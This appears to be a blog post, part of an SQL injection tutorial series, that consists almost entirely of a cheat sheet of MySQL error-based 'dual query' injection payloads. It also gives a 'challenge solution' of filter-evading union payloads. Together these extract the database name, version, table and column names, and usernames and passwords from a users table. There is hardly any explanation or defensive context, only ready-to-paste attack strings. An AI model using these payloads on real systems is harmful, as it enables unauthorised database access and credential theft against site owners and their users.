SQL INJECTION (PART 4) DUAL QUERY INJECTION
Note:First watch other parts then watch this :)
dual query injection cheat sheet :)
AND (select count(*), concat(0x3a,0x3a,(select database()),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)
AND (select 1 from (select count(*), concat(0x3a,0x3a,(select database()),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)c)
AND (select 1 from (select count(*), concat(0x3a,0x3a,(select version()),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)c)
AND (select 1 from (select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)c)
AND (select 1 from (select count(*), concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)c)
AND (select 1 from (select count(*), concat(0x3a,0x3a,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)c)
AND (select 1 from (select count(*), concat(0x3a,0x3a,(select password from users limit 0,1),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)c)
challenge solution :)
union(select!a-~0.+from(select(select database())a)c)
union(select!a-~0.+from(select(select current_user)a)c)
union(select!a-~0.+from(select(select version())a)c)
+union(select!a-~0.+from(select(select+group_concat(table_name)from+information_schema.tables+where+table_schema=database())a)c)--+
union(select!a-~0.+from(select(select+group_concat(column_name)from+information_schema.columns+where+table_name='users')a)c)
union(select!a-~0.+from(select(select+group_concat(username,0x3a,password)from users)a)c)
SQL INJECTION (PART 3) DUAL QUERY INJECTION 2/2 by pak-anonymous
0 comments:
Post a Comment